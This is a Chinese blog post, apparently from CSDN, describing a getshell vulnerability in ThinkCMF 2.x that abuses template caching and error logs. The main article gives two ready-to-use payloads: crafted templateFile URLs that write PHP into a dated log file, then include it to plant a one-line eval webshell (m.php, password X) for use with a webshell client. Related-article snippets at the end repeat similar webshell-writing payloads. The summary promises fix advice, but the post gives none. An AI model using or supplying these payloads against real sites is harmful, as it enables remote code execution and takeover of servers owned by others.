%3c?php+eval,ThinkCMF缓存Getshell漏洞

最新推荐文章于 2023-09-22 16:43:22 发布
最新推荐文章于 2023-09-22 16:43:22 发布
阅读量388 收藏
点赞数
文章标签: %3c?php+eval
本文揭示了ThinkCMF框架的一个安全漏洞,攻击者通过恶意模板文件注入,可在服务器日志中执行PHP代码,进而创建木马文件。演示了两种payload攻击方法并提供修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

由于thinkcmf2.x使用了thinkphp3.x作为开发框架,默认情况下启用了报错日志并且开启了模板缓存,导致可以使用加载一个不存在的模板来将生成一句话的PHP代码写入data/runtime/Logs/Portal目录下的日志文件中,再次包含该日志文件即可在网站根目录下生成一句话木马m.php

日志文件格式为YY_MM_DD.log,如当前日期为2019年12月12日,日志文件为19_12_12.log,完整路径为

```

data/runtime/Logs/Portal/19_12_12.log

```

**测试成功的环境**

**Linux**

宝塔[PHP7.2

**Windwo**

PHPstudy PHP7.1

Payload1:

首先访问

```

http://target.domain/?a=display&templateFile=%3C?php%20file_put_contents(%27m.php%27,%27%3C%3fphp+eval($_POST[%22X%22])%3b%3F%3E%27);die();?%3E

```

![](https://images.seebug.org/1588399442196-w331s)

然后请求

```

http://target.domain/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log

```

![](https://images.seebug.org/1588399453423-w331s)

即可在http://target.domain/根目录生成m.php,密码是X

![](https://images.seebug.org/1588399466163-w331s)

Payload2:

首先访问

```

http://target.domain/?a=display&templateFile=%3C%3F%70%68%70%20%65%76%61%6C%28%24%5F%50%4F%53%54%5BX%5D%29%3B%3F%3E

```

然后菜刀连接

```

http://target.domain/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log

```

密码同样是X

loading-bars.svg

PHP WebSehll 后门脚本与检测工具
悦分享
08-01 1742
PHP是一种动态弱类型语言,参数传递、类型转换、函数调用方式都非常灵活,这给开发者带来开发便利的同时,也给攻击者编写各种畸形恶意代码带来了很多便利,通过翻阅PHP手册
Redis未授权访问漏洞复现
Armandhe的博客
06-01 1293
redis未授权访问漏洞的复现、利用条件、防御措施、
thinkCMF 文件包含漏洞
Hacker_by_V的博客
09-09 1765
thinkCMF 文件包含漏洞 昨天给大家复现了tomcat CVE-2020-1938漏洞,那今天咱们一起再来看看,最为经典的thinkCMF文件包含漏洞。 ​ 首先我们在去介绍这个漏洞之前,我们需要先了解一下这个漏洞thinkCMFthinkCMF它是一个开源的,支持swoole的开源内容管理框架,让web开发更快,节约时间,这个框架的话是基于thinkphp的二次开发框架,所以说在我们国内还是有大部分的网站使用到这样的一个框架的。 那么我们可以想象一下如果这个框架出现了一个漏洞,那它的影响范围是
cmf nnmware_ThinkCMF缓存Getshell
weixin_40003478的博客
01-14 202
0x00:简介参考链接由于thinkcmf2.x使用了thinkphp3.x作为开发框架,默认情况下启用了报错日志并且开启了模板缓存,导致可以使用加载一个不存在的模板来将生成一句话的PHP代码写入data/runtime/Logs/Portal目录下的日志文件中,再次包含该日志文件即可在网站根目录下生成一句话木马m.php日志文件格式为YY_MM_DD.log,如当前日期为2019年12月12日,...
【组件攻击链】ThinkCMF 高危漏洞分析与利用
further_eye的博客
11-18 1521
ThinkCMF X2.x系列最大的风险存在于ThinkCMF框架中Controller中的两个模板操作函数。ThinkCMF 5系列近两年比较出名的就是CVE-2019-6713、CVE-2019-7580两个后台任意代码执行漏洞
ThinkPHP3.2.3~5.0.10缓存函数设计缺陷可导致Getshell
Fly_鹏程万里
12-11 5376
0x00 框架运行环境 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 Thinkphp在使用缓存的时候是将数据 序列化 然后存进一个php文件中这就导致我们了我们在一些情况下可以直接getshell 0x0...
ThinkCMF 2.2.0漏洞
最新发布
2301_79773660的博客
09-22 535
?>’)/shell.php?>’)
[HACK学习呀] - 2020-04-26 ThinkCMF缓存Getshell1
08-03
总之,这个ThinkCMF缓存Getshell漏洞展示了安全配置的重要性。即使使用知名且成熟的框架,也需时刻关注安全更新,并采取适当的安全策略来保护系统免受攻击。对于开发者来说,了解并防范这类攻击手法是确保应用程序...
ThinkPHP 远程命令执行漏洞复现(GetShell) 5.0.22版本
weixin_44133711的博客
05-11 1411
漏洞概况 ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞漏洞危害 攻击者可通过该漏洞获取网站的...
PHP 反序列化漏洞
weixin_43801718的博客
10-23 1414
序列化与反序列化 在维基百科中是这样定义的: 序列化是(serialization)在计算机科学的数据处理中,是指将数据结构或对象状态转换为可取用格式(例如存成文件,存于缓存,或经由网络中发送),以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。 概念其实很容易理解,就是将数据转换为一种可逆的存储格式,正向存储为序列化,反向存储就为反序列化。 按照王sir的理解,设想这样一种场景:在双十...
ThinkCmf文件包含漏洞fetch函数-过宝塔防火墙Poc1
08-03
主要我这不太会调试就 notepad++ 分析吧fetch 模板漏洞分析流程框架加载上忽略调链* 获取输出内容* 调内置的模板引擎fetch法,* 默认为空 由
ThinkCMFX文件包含漏洞
冠霖L的博客
11-03 2025
0x00 漏洞简介 ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,从而能够达到远程代码执行 0x01 影响范围 1.6.0 < ThinkCMFX < 2.3.0 0x02 环境搭建 使用ThinkCMFX2.2.0版本搭建,利用中间件phpstudy运行搭建的网站,网站一键安装即可 ...
ThinkPHP 3.2.3~5.0.10 缓存函数设计缺陷后台GetShell实战
Fly_鹏程万里
12-11 8290
0×00 前言 ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,由于其简单易用,很多cms都基于该框架改写。然而 Thinkphp缓存使用却存在缺陷,生成缓存时,Thinkphp会将数据序列化存进一个php文件,这就产生了很大的安全问题。 0×01 环境搭建 工具 phpstudy http://www.phpstudy.net/phpstudy/phpStud...
ThinkCMF&tp3.2漏洞
热门推荐
风的专栏
01-16 1万+
hinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。 ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。 每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调...
thinkcmf 代码执行 (CVE-2019-7580) 漏洞复现
YouthBelief的博客
05-10 3639
所有文章,仅供安全研究与学习之用,后果自负! thinkcmf 代码执行 CVE-2019-7580thinkcmf 代码执行 (CVE-2019-7580)0x01 漏洞描述0x02 影响范围0x03 漏洞复现3.1 登录后台3.2 漏洞利用3.2.1webshell3.2 phpinfo3.3 获取系统命令0x04 漏洞修复 thinkcmf 代码执行 (CVE-2019-7580) 复现小心会搞崩环境。 0x01 漏洞描述 ThinkCMF是一款支持Swoole的开源内容管理框架(CMF),基于Thi
ThinkCMF框架修复漏洞 名称:ThinkPHP5 远程代码执行高危漏洞(CNNVD-201812-617)
M翠峰如簇的专栏
12-01 483
漏洞名称:ThinkPHP5 远程代码执行高危漏洞(CNNVD-201812-617) 漏洞造成的影响 由于ThinkPHP5框架对Request类的method处理存在缺陷,导致黑客构造特定的请求,可直接GetWebShell入侵服务器。 ThinkCMF框架用ThinkPHP5.011内核修复方法如下: /simplewind/thinkphp/library/think/App.php 类的module方法的获取控制器的代码后面加上 if (!preg_match('/^[A-Za-z](\w.
ThinkCMF v5.0.190111 后台代码执行漏洞复现
weixin_59086772的博客
12-15 3169
近期雨笋教育小编要经常来和大家分享渗透技术干货了,感兴趣的可以多多关注我们。 0x00前言 thinkcmf5.0.19 这个版本后台提供路由自定义, 其中路由的别名对单引号缺少过滤, 导致引发漏洞。 0x01环境搭建 官方github下载地址: https://github.com/thinkcmf/thinkcmf/archive/5.0.190111.zip 将网站源码解压至phpstudy WEB目录下: C:\phpStudy\PHPTutorial 配置phpstudy实
thinkcmf任意包含漏洞
lionwerson的博客
11-18 2150
thinkcmf影响范围: thinkcmf <= 2.2.2 安装好thinkcmf: poc: ?a=display&templateFile=README.md 通过模板缓存实现的漏洞,可以读取和写入日志文件: 写入webshell: ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php..
漏洞复现-thinkcmf-文件包含】vulfocus/thinkcmf-X1.6.0-X2.2.3
10-14 2045
thinkcmf-文件包含】public函数
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值